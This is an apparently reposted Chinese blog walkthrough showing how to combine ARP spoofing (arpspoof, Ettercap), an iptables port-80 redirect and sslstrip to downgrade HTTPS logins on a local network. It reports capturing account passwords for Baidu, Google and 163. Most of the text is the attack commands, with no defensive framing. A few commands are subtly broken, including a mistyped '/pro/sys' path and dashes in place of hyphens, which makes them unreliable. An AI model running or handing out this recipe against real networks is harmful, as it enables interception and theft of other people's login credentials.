您的位置:首页 > 理论基础 > 计算机网络

SSLstrip 中间人欺骗Https转Http获取密码

2015-10-26 11:31 549 查看
渗透回顾

SSLstrip + EtterCap 中间人攻击实现https转换成http 以获取帐号密码。

Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。

数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward

然后开启Ettercap的iptables 功能





把注析去掉

来个arp欺骗不使用sslstrip 来测试一下https

Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2



Ok

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

NAT 一定的基础

-T 匹配的表 NAT表 :PREROUTING 修改来的包

:OUTPUT 修改路由前本地的包

:POSTROUTING 修改准备发出的包

-A 表示加入高级选项

-P 协议类型

-J 表示把目标80端口的数据包转到其他端口 上诉命令是10000端口

开启ETTERCAP

Ettercap –T –q –I eth0





登录http的百度 效果良好

监听到数据了





登录google

发现在https 卡顿 无法通过



开启sslstrip





再向google登录的时候 https变成http



成功登录



监听到帐号密码



百度的





163的登录



http的跳转



网速过慢……

除了使用arpspoof 还可以使用

Ettercap –T –q –M arp:remote /192.168.1.101/ //

也是arp欺骗 原理一样的
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: